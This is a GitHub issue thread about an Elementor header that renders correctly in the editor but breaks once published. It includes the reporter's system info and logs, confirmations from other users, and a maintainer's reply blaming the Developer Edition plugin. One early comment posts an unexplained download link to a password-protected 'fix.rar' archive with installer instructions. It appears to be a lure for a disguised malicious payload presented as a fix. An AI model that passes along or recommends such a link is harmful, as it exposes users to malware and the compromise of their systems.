### ISSUE TITLE
⛔ 🛟 Elementor header issue when using the Elementor Developer Edition plugin

### ISSUE THREAD

**Issue by lina55555** [elementor/elementor#28526]
### Prerequisites

- [ ] I have searched for similar issues in open and closed tickets and cannot find a duplicate.
- [ ] I have troubleshooted my issue, and it still exists against the latest stable version of Elementor.

### Description

I am experiencing issues with elementor header. The design and layout all look great on the edit mode, but once  I publish it or preview it it all goes messy. I have deactivated plugins, themes, tried everything really, but no joy. Footer looks like it's working perfectly fine. Please help. I am attaching a video of how the issue looks and a screenshot of what it looks like in edit mode.

https://github.com/user-attachments/assets/6906cd23-fb40-40f9-8b22-a0c401f893f9

<img width="1719" alt="edit mode, perfect deisgn" src="https://github.com/user-attachments/assets/bc975dbe-76a6-4a4b-b2d6-817378e6fe83">

### Steps to reproduce

https://github.com/user-attachments/assets/e8f9bb7c-45b4-47b8-a319-2b04dd89688a

<img width="1719" alt="edit mode, perfect deisgn" src="https://github.com/user-attachments/assets/3d9d203a-6b36-4a10-8ae8-ec48055227b0">

### Expected behavior

receive an advice
help
guide

### Isolating the problem

- [ ] This bug happens when only the Elementor (and Elementor Pro) plugins are active.
- [ ] This bug happens with the Hello Elementor theme active.
- [ ] I can reproduce this bug consistently by following the steps I described above.

### Elementor System Info

<details>
<summary>Click to reveal</summary>

````txt


== Server Environment ==
	Operating System: Linux
	Software: nginx
	MySQL version: MariaDB Server v10.6.18
	PHP Version: 8.1.29
	PHP Memory Limit: 512M
	PHP Max Input Vars: 6144
	PHP Max Post Size: 2047M
	GD Installed: Yes
	ZIP Installed: Yes
	Write Permissions: All right
	Elementor Library: Connected

== WordPress Environment ==
	Version: 6.6.1
	Site URL: https://blog.rippleenergy.com
	Home URL: https://blog.rippleenergy.com
	WP Multisite: No
	Max Upload Size: 2 GB
	Memory limit: 512M
	Max Memory limit: 512M
	Permalink Structure: /%category%/%postname%/
	Language: en_GB
	Timezone: Europe/London
	Debug Mode: Inactive

== Theme ==
	Name: OceanWP
	Version: 3.5.9
	Author: OceanWP
	Child Theme: No

== User ==
	Role: administrator
	WP Profile lang: en-US
	User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15

== Active Plugins ==
	Akismet Anti-spam: Spam Protection
		Version: 5.3.3
		Author: Automattic - Anti-spam Team

	Classic Editor
		Version: 1.6.4
		Author: WordPress Contributors

	CoBlocks
		Version: 3.1.13
		Author: GoDaddy

	Easy Footnotes
		Version: 1.1.6
		Author: Jason Yingling

	Elementor
		Version: 3.24.0-dev1
		Author: Elementor.com

	Elementor Beta (Developer Edition)
		Version: 1.1.3
		Author: Elementor.com

	Elementor Header & Footer Builder
		Version: 1.6.40
		Author: Brainstorm Force, Nikhil Chavan

	Elementor Pro
		Version: 3.23.3
		Author: Elementor.com

	Hotjar
		Version: 1.0.16
		Author: Hotjar

	Jetpack
		Version: 13.8-a.7
		Author: Automattic

	LiteSpeed Cache
		Version: 6.4.1
		Author: LiteSpeed Technologies

	Ocean Extra
		Version: 2.3.0
		Author: OceanWP

	Page Optimize
		Version: 0.5.5
		Author: Automattic

	WPGraphQL
		Version: 1.28.1
		Author: WPGraphQL

	Yoast SEO
		Version: 23.3
		Author: Team Yoast


== Must-Use Plugins ==
	wpcomsh-loader.php
		Version: 
		Author: 


== Elements Usage ==
	
	container : 6
		button : 2
		container : 13
		heading : 7
		icon : 1
		image : 2
		text-editor : 4
	footer : 1
		container : 21
		heading : 70
		icon-box : 1
		image : 2
		social-icons : 1
		text-editor : 1
	header : 2
		button : 6
		container : 23
		mega-menu : 1
		nav-menu : 5
		theme-site-logo : 3
	page : 4
		button : 6
		container : 95
		divider : 16
		heading : 34
		icon-box : 3
		image : 19
		image-box : 4
		post-info : 3
		post-navigation : 3
		posts : 3
		share-buttons : 3
		text-editor : 34
		video : 1
	wp-post : 21
		button : 13
		container : 207
		divider : 29
		heading : 67
		icon-box : 7
		image : 50
		image-box : 8
		nav-menu : 2
		post-info : 5
		post-navigation : 7
		posts : 7
		share-buttons : 7
		spacer : 1
		text-editor : 94
		theme-site-logo : 1
		video : 2
	wp-page : 3
		button : 2
		container : 7
		nav-menu : 2
		posts : 1
		theme-site-logo : 1


== Settings ==
	
	cpt_support: post, page, e-landing-page
	allow_tracking: yes
	unfiltered_files_upload: 1


== Features ==
	Custom Fonts: 0
	Custom Icons: 0

== Integrations ==
	


== Elementor Experiments ==
	Improved CSS Loading: Active by default
	Inline Font Icons: Active by default
	Additional Custom Breakpoints: Active by default
	Flexbox Container: Active by default
	Grid Container: Active by default
	Upgrade Swiper Library: Active by default
	Nested Elements Performance: Active by default
	Optimized Control Loading: Active by default
	Optimized Markup: Inactive by default
	Conditionally load Swiper CSS files: Inactive by default
	Plugin Onboarding: Active by default
	Default to New Theme Builder: Active by default
	Elementor Home Screen: Active by default
	Build with AI: Active by default
	Landing Pages: Active by default
	Launchpad Checklist: Inactive by default
	Nested Elements: Active by default
	Editor Top Bar: Active by default
	Pages Panel: Inactive by default
	Element Caching: Active by default
	Elementor Editor Events: Inactive by default
	Atomic Widgets: Inactive by default
	Menu: Active by default
	Taxonomy Filter: Active by default
	Search: Active by default


== Log ==
	
Log: showing 20 of 252023-11-27 12:03:50 [info] Elementor/Upgrades - _on_each_version Start  
2023-11-27 12:03:50 [info] Elementor/Upgrades - _on_each_version Finished 
2023-11-27 12:03:50 [info] Elementor data updater process has been completed. [array (
  'plugin' => 'Elementor',
  'from' => '3.18.0-dev2',
  'to' => '3.18.0-dev3',
)]
2023-11-27 12:03:50 [info] Elementor data updater process has been queued. [array (
  'plugin' => 'Elementor',
  'from' => '3.18.0-dev2',
  'to' => '3.18.0-dev3',
)]
2023-11-30 00:04:20 [info] elementor::elementor_updater Started 
2023-11-30 00:04:20 [info] Elementor/Upgrades - _on_each_version Start  
2023-11-30 00:04:20 [info] Elementor/Upgrades - _on_each_version Finished 
2023-11-30 00:04:20 [info] Elementor data updater process has been completed. [array (
  'plugin' => 'Elementor',
  'from' => '3.18.0-dev3',
  'to' => '3.18.0-dev4',
)]
2023-11-30 00:04:20 [info] Elementor data updater process has been queued. [array (
  'plugin' => 'Elementor',
  'from' => '3.18.0-dev3',
  'to' => '3.18.0-dev4',
)]
2023-12-09 10:31:57 [info] elementor::elementor_updater Started 
2023-12-09 10:31:57 [info] Elementor/Upgrades - _on_each_version Start  
2023-12-09 10:31:57 [info] Elementor/Upgrades - _on_each_version Finished 
2023-12-09 10:31:57 [info] Elementor data updater process has been completed. [array (
  'plugin' => 'Elementor',
  'from' => '3.18.0-dev4',
  'to' => '3.18.2',
)]
2023-12-09 10:31:58 [info] Elementor data updater process has been queued. [array (
  'plugin' => 'Elementor',
  'from' => '3.18.0-dev4',
  'to' => '3.18.2',
)]
2024-06-25 13:10:33 [info] elementor-pro::elementor_pro_updater Started 
2024-06-25 13:10:33 [info] Elementor Pro/Upgrades - _on_each_version Start  
2024-06-25 13:10:33 [info] Elementor Pro/Upgrades - _on_each_version Finished 
2024-06-25 13:10:33 [info] Elementor data updater process has been completed. [array (
  'plugin' => 'Elementor Pro',
  'from' => '3.22.0',
  'to' => '3.22.1',
)]
2024-06-25 13:10:33 [info] Elementor data updater process has been queued. [array (
  'plugin' => 'Elementor Pro',
  'from' => '3.22.0',
  'to' => '3.22.1',
)]
2024-06-25 13:10:34 [info] Elementor data updater process has been queued. [array (
  'plugin' => 'Elementor Pro',
  'from' => '3.22.0',
  'to' => '3.22.1',
)]

PHP: showing 7 of 7PHP: 2024-04-02 07:38:19 [notice X 478][../wp-content/plugins/elementor/includes/elements/section.php::1451] Undefined index: background_overlay_hover_background [array (
  'trace' => '
#0: Elementor\Core\Logger\Manager -> shutdown()
',
)]
PHP: 2024-04-02 07:54:43 [error X 1][../wp-content/plugins/elementor/data/v2/base/controller.php::227] Uncaught Elementor\Data\V2\Base\Exceptions\WP_Error_Exception: Method 'WP_REST_Controller::get_item_permissions_check' not implemented. Must be overridden in subclass. in ../wp-content/plugins/elementor/data/v2/base/controller.php:227
Stack trace:
#0 ../wp-content/plugins/elementor/data/v2/base/base-route.php(105): Elementor\Data\V2\Base\Controller->get_permission_callback(Object(WP_REST_Request))
#1 ../wp-content/plugins/elementor/data/v2/base/base-route.php(242): Elementor\Data\V2\Base\Base_Route->get_permission_callback(Object(WP_REST_Request))
#2 /wordpress/core/6.4.3/wp-includes/rest-api/class-wp-rest-server.php(1160): Elementor\Data\V2\Base\Base_Route->Elementor\Data\V2\Base\{closure}(Object(WP_REST_Request))
#3 /wordpress/core/6.4.3/wp-includes/rest-api/class-wp-rest-server.php(1041): WP_REST_Server->respond_to_request(Object(WP_REST_Request), '/elementor/v1/f...', Array, NULL)
#4 /wordpress/core/6.4.3/wp-includes/rest-api/class-wp-rest-server.php(431): WP_REST_Server->dispatch(Object(WP_REST_Request))
#5 /wordpress/core/6.4.3/wp-includes/rest-api.php(424): WP_REST_Server->serve_request('/elementor/v1/f...')
#6 /wordpress/core/6.4.3/wp-includes/class-wp-hook.php(324): rest_api_loaded(Object(WP))
#7 /wordpress/core/6.4.3/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters(NULL, Array)
#8 /wordpress/core/6.4.3/wp-includes/plugin.php(565): WP_Hook->do_action(Array)
#9 /wordpress/core/6.4.3/wp-includes/class-wp.php(418): do_action_ref_array('parse_request', Array)
#10 /wordpress/core/6.4.3/wp-includes/class-wp.php(813): WP->parse_request('')
#11 /wordpress/core/6.4.3/wp-includes/functions.php(1336): WP->main('')
#12 /wordpress/core/6.4.3/wp-blog-header.php(16): wp()
#13 /wordpress/core/6.4.3/index.php(17): require('/wordpress/core...')
#14 {main}
  thrown [array (
  'trace' => '
#0: Elementor\Core\Logger\Manager -> shutdown()
',
)]
PHP: 2024-06-01 11:30:11 [error X 1][../wp-content/plugins/elementor/data/v2/base/controller.php::227] Uncaught Elementor\Data\V2\Base\Exceptions\WP_Error_Exception: Method 'WP_REST_Controller::get_item_permissions_check' not implemented. Must be overridden in subclass. in ../wp-content/plugins/elementor/data/v2/base/controller.php:227
Stack trace:
#0 ../wp-content/plugins/elementor/data/v2/base/base-route.php(105): Elementor\Data\V2\Base\Controller->get_permission_callback(Object(WP_REST_Request))
#1 ../wp-content/plugins/elementor/data/v2/base/base-route.php(242): Elementor\Data\V2\Base\Base_Route->get_permission_callback(Object(WP_REST_Request))
#2 /wordpress/core/6.5.3/wp-includes/rest-api/class-wp-rest-server.php(1197): Elementor\Data\V2\Base\Base_Route->Elementor\Data\V2\Base\{closure}(Object(WP_REST_Request))
#3 /wordpress/core/6.5.3/wp-includes/rest-api/class-wp-rest-server.php(1063): WP_REST_Server->respond_to_request(Object(WP_REST_Request), '/elementor/v1/f...', Array, NULL)
#4 /wordpress/core/6.5.3/wp-includes/rest-api/class-wp-rest-server.php(439): WP_REST_Server->dispatch(Object(WP_REST_Request))
#5 /wordpress/core/6.5.3/wp-includes/rest-api.php(428): WP_REST_Server->serve_request('/elementor/v1/f...')
#6 /wordpress/core/6.5.3/wp-includes/class-wp-hook.php(324): rest_api_loaded(Object(WP))
#7 /wordpress/core/6.5.3/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters(NULL, Array)
#8 /wordpress/core/6.5.3/wp-includes/plugin.php(565): WP_Hook->do_action(Array)
#9 /wordpress/core/6.5.3/wp-includes/class-wp.php(418): do_action_ref_array('parse_request', Array)
#10 /wordpress/core/6.5.3/wp-includes/class-wp.php(813): WP->parse_request('')
#11 /wordpress/core/6.5.3/wp-includes/functions.php(1336): WP->main('')
#12 /wordpress/core/6.5.3/wp-blog-header.php(16): wp()
#13 /wordpress/core/6.5.3/index.php(17): require('/wordpress/core...')
#14 {main}
  thrown [array (
  'trace' => '
#0: Elementor\Core\Logger\Manager -> shutdown()
',
)]
PHP: 2024-06-18 09:52:16 [notice X 256][../wp-content/plugins/elementor/includes/base/controls-stack.php::229] hexdec(): Passing null to parameter #1 ($hex_string) of type string is deprecated [array (
  'trace' => '
#0: Elementor\Core\Logger\Manager -> shutdown()
',
)]
PHP: 2024-06-19 09:26:32 [warning X 6][../wp-content/plugins/elementor/modules/history/revisions-manager.php::363] Undefined array key "editor_post_id" [array (
  'trace' => '
#0: Elementor\Core\Logger\Manager -> shutdown()
',
)]
PHP: 2024-06-20 13:23:27 [warning X 8][../wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/templates.php::150] Undefined array key "condition_type" [array (
  'trace' => '
#0: ../wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/templates.php(150): Elementor\Core\Logger\Manager -> rest_error_handler()
#1: ElementorPro\Core\App\Modules\SiteEditor\Data\Endpoints\Templates -> normalize_template_json_item()
#2: ../wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/templates.php(120): class type array_map()
#3: ../wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/templates.php(59): ElementorPro\Core\App\Modules\SiteEditor\Data\Endpoints\Templates -> normalize_templates_json()
#4: ../wp-content/plugins/elementor/data/base/endpoint.php(158): ElementorPro\Core\App\Modules\SiteEditor\Data\Endpoints\Templates -> get_items()
',
)]
PHP: 2024-07-02 15:44:56 [error X 1][../wp-content/plugins/elementor/data/v2/base/controller.php::227] Uncaught Elementor\Data\V2\Base\Exceptions\WP_Error_Exception: Method 'WP_REST_Controller::get_item_permissions_check' not implemented. Must be overridden in subclass. in ../wp-content/plugins/elementor/data/v2/base/controller.php:227
Stack trace:
#0 ../wp-content/plugins/elementor/data/v2/base/base-route.php(105): Elementor\Data\V2\Base\Controller->get_permission_callback(Object(WP_REST_Request))
#1 ../wp-content/plugins/elementor/data/v2/base/base-route.php(242): Elementor\Data\V2\Base\Base_Route->get_permission_callback(Object(WP_REST_Request))
#2 /wordpress/core/6.5.5/wp-includes/rest-api/class-wp-rest-server.php(1197): Elementor\Data\V2\Base\Base_Route->Elementor\Data\V2\Base\{closure}(Object(WP_REST_Request))
#3 /wordpress/core/6.5.5/wp-includes/rest-api/class-wp-rest-server.php(1063): WP_REST_Server->respond_to_request(Object(WP_REST_Request), '/elementor/v1/f...', Array, NULL)
#4 /wordpress/core/6.5.5/wp-includes/rest-api/class-wp-rest-server.php(439): WP_REST_Server->dispatch(Object(WP_REST_Request))
#5 /wordpress/core/6.5.5/wp-includes/rest-api.php(428): WP_REST_Server->serve_request('/elementor/v1/f...')
#6 /wordpress/core/6.5.5/wp-includes/class-wp-hook.php(324): rest_api_loaded(Object(WP))
#7 /wordpress/core/6.5.5/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters(NULL, Array)
#8 /wordpress/core/6.5.5/wp-includes/plugin.php(565): WP_Hook->do_action(Array)
#9 /wordpress/core/6.5.5/wp-includes/class-wp.php(418): do_action_ref_array('parse_request', Array)
#10 /wordpress/core/6.5.5/wp-includes/class-wp.php(813): WP->parse_request('')
#11 /wordpress/core/6.5.5/wp-includes/functions.php(1336): WP->main('')
#12 /wordpress/core/6.5.5/wp-blog-header.php(16): wp()
#13 /wordpress/core/6.5.5/index.php(17): require('/wordpress/core...')
#14 {main}
  thrown [array (
  'trace' => '
#0: Elementor\Core\Logger\Manager -> shutdown()
',
)]

JS: showing 10 of 10JS: 2024-05-28 10:56:59 [error X 6][../wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.22.0-dev4:3:917682] Cannot read properties of undefined (reading 'val') 
JS: 2024-06-21 06:57:16 [error X 3][../wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.22.0-dev6:3:825158] Cannot read properties of undefined (reading 'localized') 
JS: 2024-07-19 08:38:11 [error X 4][../wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.23.0-dev6:3:663219] Cannot read properties of undefined (reading 'isDesignable') 
JS: 2024-07-19 12:12:58 [error X 1][../wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.23.0-dev6:3:867904] Cannot convert undefined or null to object 
JS: 2024-07-22 08:52:39 [error X 1][https://editor-static-bucket.elementor.com/ai-integration.js?v=1721637087944&ver=3.23.0-dev6:9:24] Cannot destructure property 'jwt' of 'n.config' as it is undefined. 
JS: 2024-08-16 09:16:16 [error X 1][../wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.23.0-dev6:3:831441] undefined is not an object (evaluating 'T.originalEvent.key.toLowerCase') 
JS: 2024-08-27 10:16:32 [error X 1][../wp-content/plugins/elementor/assets/js/ai-gutenberg.min.js?ver=3.24.0-dev1:3:356913] undefined is not an object (evaluating 'wp.blocks.createBlock') 
JS: 2024-08-27 12:02:09 [error X 2][../wp-content/plugins/elementor/assets/js/editor.min.js?ver=3.24.0-dev1:3:664836] undefined is not an object (evaluating 'this.view.container.isDesignable') 
JS: 2024-08-27 12:26:03 [error X 1][../wp-content/plugins/elementor/assets/js/packages/editor-documents/editor-documents.min.js?ver=3.24.0-dev1:1:2101] null is not an object (evaluating 't.config') 
JS: 2024-08-27 12:32:02 [error X 2][../wp-content/plugins/elementor/assets/js/d91e4d7f57d57af2aab9.bundle.min.js:2:7789] null is not an object (evaluating 't.target.closest(".elementor").dataset') 



== Elementor - Compatibility Tag ==
	
	Elementor Header & Footer Builder: Compatibility not specified
	Elementor Pro: Compatibility not specified

== Elementor Pro - Compatibility Tag ==

````

</details>

### Agreement

- [X] I agree that my issue may be closed without action if it doesn't meet all the requirements.

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Eniolaf** [comment]
I am experiencing the exact same issue. I had to deactivate all my plugins to find out what was going on. When Elementor Pro was activated, the issue was apparent. 

![Picture1](https://github.com/user-attachments/assets/77954cb5-4c73-4b03-b644-8da8893ce4d4)

**Comment by HeleneGuay** [comment]
I Have the exact same problem - When I desactivate elementor pro there i can actually navigate in my website 
![IMG_6351](https://github.com/user-attachments/assets/2c3726de-d134-494a-ab92-4bb1134cc56f)

**Comment by TECKPRO1** [comment]
Same here. I experience the same issue
![website published](https://github.com/user-attachments/assets/541110bb-b046-4a1b-9d14-5805a3a3d7de)

**Comment by maxms** [comment]
Same issue here but on the footer with v. 3.23.3. Fixed when reverting to the previous version.

Tried the regenerate button and cleared cache with no change before reverting.
<img width="1805" alt="Screenshot 2024-08-28 at 1 38 15 PM" src="https://github.com/user-attachments/assets/2ea511e8-75cc-464f-a74b-c6f8206d891c">

In Safari I see an insecure content error (attached.)

**Comment by Mark-This** [comment]
We have the exact same issue, please let us know when this is resolved. Thank you

**Comment by zagartw** [comment]
I had the same issue, 
![image](https://github.com/user-attachments/assets/d2132d2d-fb44-4f7e-ab7f-fe1b9be4dc16)
but I decided to recreate the header.  It was partly successful in that my header is readable. 
![image](https://github.com/user-attachments/assets/528d4aec-8982-4448-9cda-792f263ae752)
However the new header appears as a secund menu.
In 'Edit with Elementor' I see two boxes I cannot delete.
![image](https://github.com/user-attachments/assets/2a3113c0-27bc-4406-9531-6d45e84fb3c3)
I am a beginner, so my apologies if this is addressed elsewhere,  But your help will be most appreciated.

**Comment by Eniolaf** [comment]
It seems reverting to the previous version fixed the problem for me. 

See comment on this here: https://github.com/elementor/elementor/issues/28533#issuecomment-2314116068

**Comment by nicholaszein** [comment]
Hello everyone!

Thank you for reaching out! 🙏 

We noticed that you're using the **_Elementor Beta (Developer Edition)_** plugin. This edition is a playground for developers to test their plugins and themes with the most recent features of Elementor, and **<ins>it's not quite intended for use on live websites.</ins>**

In the most recent release of this Developer Edition plugin, a conflict between the Core version (3.24.0-dev3) and older versions of the Pro plugin has caused an incompatibility in the rendering of the CSS. This should be fixed with the release of the Elementor Core (Free) version 3.24.0, and Elementor Pro version 3.24.0 tomorrow.

### 🧪 Due to the experimental nature of this Developer Edition plugin, we're unable to provide support for it. 

But don't worry! Our stable versions are full of great features that are ready for prime time on your website.

### 🔄 Please, [revert back to a stable version of Elementor](https://elementor.com/help/revert-to-release-from-developer-edition/) if you're working on a production site.

Kind regards
